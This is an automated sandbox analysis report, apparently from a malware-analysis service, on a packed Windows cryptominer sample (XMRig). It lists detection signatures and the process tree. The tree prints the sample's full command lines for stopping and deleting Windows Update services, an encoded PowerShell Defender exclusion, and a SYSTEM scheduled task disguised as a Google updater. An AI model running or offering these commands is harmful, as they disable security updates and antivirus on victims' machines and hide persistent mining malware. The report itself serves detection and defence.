Analysis
-
max time kernel
301s -
max time network
288s -
platform
windows7_x64 -
resource
win7-20220718-en -
resource tags
arch:x64arch:x86image:win7-20220718-enlocale:en-usos:windows7-x64system -
submitted
05-08-2022 22:18
Behavioral task
behavioral1
Sample
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource
win7-20220718-en
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe -
XMRig Miner payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/1496-160-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-162-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-164-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-165-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-167-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-169-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-171-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-172-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-173-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-175-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-177-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-178-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral1/memory/1496-180-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 1712 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1780 takeown.exe 1712 icacls.exe 1900 takeown.exe 1504 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 992 taskeng.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 1504 icacls.exe 1780 takeown.exe 1712 icacls.exe 1900 takeown.exe -
Processes:
resource yara_rule behavioral1/memory/872-54-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/872-55-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/872-57-0x0000000000400000-0x0000000001066000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1712-99-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/1712-101-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral1/memory/1712-105-0x0000000000400000-0x0000000001066000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida -
Processes:
updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exepid process 872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe 1712 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 1392 set thread context of 1496 1392 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
conhost.execonhost.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe conhost.exe File opened for modification C:\Program Files\Google\Chrome\updater.exe conhost.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 2028 sc.exe 1392 sc.exe 1640 sc.exe 780 sc.exe 1048 sc.exe 912 sc.exe 292 sc.exe 628 sc.exe 1068 sc.exe 1588 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 5 IoCs
Processes:
conhost.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" conhost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f0fba5292aa9d801 powershell.exe -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 456 reg.exe 1412 reg.exe 828 reg.exe 2016 reg.exe 1396 reg.exe 1208 reg.exe 2044 reg.exe 1468 reg.exe 692 reg.exe 320 reg.exe 532 reg.exe 2044 reg.exe 1988 reg.exe 780 reg.exe 1540 reg.exe 1684 reg.exe 1744 reg.exe 1060 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.execonhost.exeexplorer.exepid process 1380 powershell.exe 628 conhost.exe 1908 powershell.exe 1392 conhost.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe 1496 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 468 -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exetakeown.exepowershell.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exetakeown.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1380 powershell.exe Token: SeShutdownPrivilege 1232 powercfg.exe Token: SeShutdownPrivilege 1540 powercfg.exe Token: SeShutdownPrivilege 636 powercfg.exe Token: SeDebugPrivilege 628 conhost.exe Token: SeShutdownPrivilege 1168 powercfg.exe Token: SeTakeOwnershipPrivilege 1900 takeown.exe Token: SeDebugPrivilege 1908 powershell.exe Token: SeShutdownPrivilege 1752 powercfg.exe Token: SeShutdownPrivilege 908 powercfg.exe Token: SeDebugPrivilege 1392 conhost.exe Token: SeShutdownPrivilege 1368 powercfg.exe Token: SeShutdownPrivilege 1504 powercfg.exe Token: SeTakeOwnershipPrivilege 1780 takeown.exe Token: SeLockMemoryPrivilege 1496 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exedescription pid process target process PID 872 wrote to memory of 628 872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 872 wrote to memory of 628 872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 872 wrote to memory of 628 872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 872 wrote to memory of 628 872 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 628 wrote to memory of 1380 628 conhost.exe powershell.exe PID 628 wrote to memory of 1380 628 conhost.exe powershell.exe PID 628 wrote to memory of 1380 628 conhost.exe powershell.exe PID 628 wrote to memory of 1400 628 conhost.exe cmd.exe PID 628 wrote to memory of 1400 628 conhost.exe cmd.exe PID 628 wrote to memory of 1400 628 conhost.exe cmd.exe PID 628 wrote to memory of 1700 628 conhost.exe cmd.exe PID 628 wrote to memory of 1700 628 conhost.exe cmd.exe PID 628 wrote to memory of 1700 628 conhost.exe cmd.exe PID 1400 wrote to memory of 1392 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1392 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1392 1400 cmd.exe sc.exe PID 1700 wrote to memory of 1232 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1232 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1232 1700 cmd.exe powercfg.exe PID 1400 wrote to memory of 1640 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1640 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1640 1400 cmd.exe sc.exe PID 1700 wrote to memory of 1540 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1540 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1540 1700 cmd.exe powercfg.exe PID 1400 wrote to memory of 780 1400 cmd.exe sc.exe PID 1400 wrote to memory of 780 1400 cmd.exe sc.exe PID 1400 wrote to memory of 780 1400 cmd.exe sc.exe PID 1700 wrote to memory of 636 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 636 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 636 1700 cmd.exe powercfg.exe PID 1400 wrote to memory of 1048 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1048 1400 cmd.exe sc.exe PID 1400 wrote to memory of 1048 1400 cmd.exe sc.exe PID 1700 wrote to memory of 1168 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1168 1700 cmd.exe powercfg.exe PID 1700 wrote to memory of 1168 1700 cmd.exe powercfg.exe PID 1400 wrote to memory of 292 1400 cmd.exe sc.exe PID 1400 wrote to memory of 292 1400 cmd.exe sc.exe PID 1400 wrote to memory of 292 1400 cmd.exe sc.exe PID 1400 wrote to memory of 320 1400 cmd.exe reg.exe PID 1400 wrote to memory of 320 1400 cmd.exe reg.exe PID 1400 wrote to memory of 320 1400 cmd.exe reg.exe PID 1400 wrote to memory of 828 1400 cmd.exe reg.exe PID 1400 wrote to memory of 828 1400 cmd.exe reg.exe PID 1400 wrote to memory of 828 1400 cmd.exe reg.exe PID 1400 wrote to memory of 532 1400 cmd.exe reg.exe PID 1400 wrote to memory of 532 1400 cmd.exe reg.exe PID 1400 wrote to memory of 532 1400 cmd.exe reg.exe PID 1400 wrote to memory of 1208 1400 cmd.exe reg.exe PID 1400 wrote to memory of 1208 1400 cmd.exe reg.exe PID 1400 wrote to memory of 1208 1400 cmd.exe reg.exe PID 1400 wrote to memory of 2016 1400 cmd.exe reg.exe PID 1400 wrote to memory of 2016 1400 cmd.exe reg.exe PID 1400 wrote to memory of 2016 1400 cmd.exe reg.exe PID 1400 wrote to memory of 1900 1400 cmd.exe takeown.exe PID 1400 wrote to memory of 1900 1400 cmd.exe takeown.exe PID 1400 wrote to memory of 1900 1400 cmd.exe takeown.exe PID 1400 wrote to memory of 1504 1400 cmd.exe icacls.exe PID 1400 wrote to memory of 1504 1400 cmd.exe icacls.exe PID 1400 wrote to memory of 1504 1400 cmd.exe icacls.exe PID 628 wrote to memory of 1068 628 conhost.exe cmd.exe PID 628 wrote to memory of 1068 628 conhost.exe cmd.exe PID 628 wrote to memory of 1068 628 conhost.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"2⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {97B9D42D-77A4-430E-8B02-6FA1F34A19B5} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"3⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f5⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f5⤵
- Modifies registry key
-
